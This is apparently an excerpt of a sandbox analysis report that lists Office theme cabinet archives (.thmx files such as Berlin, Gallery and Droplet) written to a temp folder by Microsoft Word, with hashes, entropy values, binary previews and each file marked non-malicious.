                                        Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-

                                        C:\Users\user\AppData\Local\Temp\cab8D3A.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):222992
                                        Entropy (8bit):7.994458910952451
                                        Encrypted:true
                                        SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                        MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                        SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                        SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                        SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                        Malicious:false
                                        Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....

                                        C:\Users\user\AppData\Local\Temp\cab8D7D.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):640684
                                        Entropy (8bit):7.99860205353102
                                        Encrypted:true
                                        SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                        MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                        SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                        SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                        SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                        Malicious:false
                                        Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e

                                        C:\Users\user\AppData\Local\Temp\cab8D8E.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):698244
                                        Entropy (8bit):7.997838239368002
                                        Encrypted:true
                                        SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                        MD5:E29CE2663A56A1444EAA3732FFB82940
                                        SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                        SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                        SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                        Malicious:false
                                        Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..

                                        C:\Users\user\AppData\Local\Temp\cab8F5D.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):953453
                                        Entropy (8bit):7.99899040756787
                                        Encrypted:true
                                        SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                        MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                        SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                        SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                        SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                        Malicious:false
                                        Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..

                                        C:\Users\user\AppData\Local\Temp\cab8FBD.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):1065873
                                        Entropy (8bit):7.998277814657051
                                        Encrypted:true
                                        SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                        MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                        SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                        SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                        SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                        Malicious:false
                                        Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...

                                        C:\Users\user\AppData\Local\Temp\cab900D.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):1097591
                                        Entropy (8bit):7.99825462915052
                                        Encrypted:true
                                        SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                        MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                        SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                        SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                        SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                        Malicious:false
                                        Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I

                                        C:\Users\user\AppData\Local\Temp\cab9186.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):1310275
                                        Entropy (8bit):7.9985829899274385
                                        Encrypted:true
                                        SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                        MD5:9C9F49A47222C18025CC25575337A965
                                        SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                        SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                        SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                        Malicious:false
                                        Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.

                                        C:\Users\user\AppData\Local\Temp\cab9409.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):1766185
                                        Entropy (8bit):7.9991290831091115
                                        Encrypted:true
                                        SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                        MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                        SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                        SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                        SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                        Malicious:false
                                        Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+

                                        C:\Users\user\AppData\Local\Temp\cab94F5.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):1881952
                                        Entropy (8bit):7.999066394602922
                                        Encrypted:true
                                        SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                        MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                        SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                        SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                        SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                        Malicious:false
                                        Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{

                                        C:\Users\user\AppData\Local\Temp\cab9843.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):2527736
                                        Entropy (8bit):7.992272975565323
                                        Encrypted:true
                                        SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                        MD5:F256ACA509B4C6C0144D278C7036B0A8
                                        SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                        SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                        SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                        Malicious:false
                                        Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w

                                        C:\Users\user\AppData\Local\Temp\cab98C2.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):2591108
                                        Entropy (8bit):7.999030891647433
                                        Encrypted:true
                                        SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                        MD5:BEB12A0464D096CA33BAEA4352CE800F
                                        SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                        SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                        SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                        Malicious:false
                                        Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....

                                        C:\Users\user\AppData\Local\Temp\cab9CFA.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):3256855
                                        Entropy (8bit):7.996842935632312
                                        Encrypted:true
                                        SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                        MD5:8867BDF5FC754DA9DA6F5BA341334595
                                        SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                        SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                        SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                        Malicious:false
                                        Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...

                                        C:\Users\user\AppData\Local\Temp\cab9D59.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):3417042
                                        Entropy (8bit):7.997652455069165
                                        Encrypted:true
                                        SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                        MD5:749C3615E54C8E6875518CFD84E5A1B2
                                        SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                        SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                        SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                        Malicious:false
